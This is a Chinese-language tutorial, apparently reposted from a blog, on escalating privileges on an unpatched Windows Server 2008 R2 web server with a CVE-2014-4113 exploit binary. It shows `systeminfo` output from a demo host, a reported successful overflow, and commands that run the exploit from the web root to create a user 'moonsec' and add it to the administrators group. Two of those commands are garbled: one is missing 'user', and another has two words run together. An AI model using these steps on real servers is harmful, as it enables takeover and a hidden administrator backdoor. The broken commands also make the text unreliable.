摘要

1、簡介

在winserver2008 r2 中 服務器默認是支持aspx的。所以默認都是可以執行一些命令。

如果沒有進行補丁修復可以利用一些溢出提權工具,進行提權。

2、CVE-2014-4113-Exploit

這個版本的提權工具 可以對winserver2008 的系統進行溢出提權

3、實戰

systeminfo 這個命令查看系統信息的

主機名:??????????WIN-HRKJ54V1GSJ

OS?名稱:?????????Microsoft?Windows?Web?Server?2008?R2

OS?版本:?????????6.1.7601?Service?Pack?1?Build?7601

OS?制造商:????????MicrosoftCorporation

OS?配置:??????????獨立服務器

OS?構件類型:?????Multiprocessor?Free

注冊的所有人:????Windows?用戶

注冊的組織:

產品?ID:?????????00500-001-0000635-84743

初始安裝日期:????2019/3/3,?16:24:34

系統啟動時間:????2019/4/7,?17:14:40

系統制造商:??????VMware,?Inc.

系統型號:????????VMware7,1

系統類型:????????x64-based?PC

處理器:??????????安裝了?2?個處理器。

[01]:?Intel64?Family?6?Model94?Stepping?3?GenuineIntel?~3408?Mhz

[02]:?Intel64?Family?6?Model94?Stepping?3?GenuineIntel?~3408?Mhz

BIOS?版本:????????VMware,?Inc.VMW71.00V.6997262.B64.1710270607,?2017/10/27

Windows?目錄:?????C:\Windows

系統目錄:????????C:\Windows\system32

啟動設備:????????\Device\HarddiskVolume1

系統區域設置:????zh-cn;中文(中國)

輸入法區域設置:??zh-cn;中文(中國)

時區:????????????(UTC+08:00)北京，重慶，香港特別行政區，烏魯木齊

物理內存總量:????4,095?MB

可用的物理內存:??2,939?MB

虛擬內存:?最大值:?8,188?MB

虛擬內存:?可用:???6,603?MB

虛擬內存:?使用中:?1,585?MB

頁面文件位置:????C:\pagefile.sys

域:???????????????WORKGROUP

登錄服務器:??????暫缺

修補程序:????????安裝了?2?個修補程序。

[01]:?KB2999226

[02]:?KB976902

網卡:????????????安裝了?1?個?NIC。

[01]:?Intel(R)?82574L?GigabitNetwork?Connection

連接名:??????本地連接

啟用?DHCP:???否

IP?地址

[01]:?192.168.0.105

[02]:fe80::986d:3564:19ad:2447

溢出成功

如果找不到可寫目錄 可以 使用遍歷可寫目錄的腳本進行查找

增加用戶

/c?C:\inetpub\wwwroot\www.demo1.com\Win64.exe?"net?moonsec?moonsec?/add"

增加到用戶組

/c?C:\inetpub\wwwroot\www.demo1.com\Win64.exe?"net?localgroup?administratorsmoonsec?/add"

您可以選擇一種方式贊助本站支付寶轉賬贊助

分享到各大網站

總結

以上是生活随笔為你收集整理的服务器2008系统提权工具,提权教程：winserver2008R2溢出提权的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。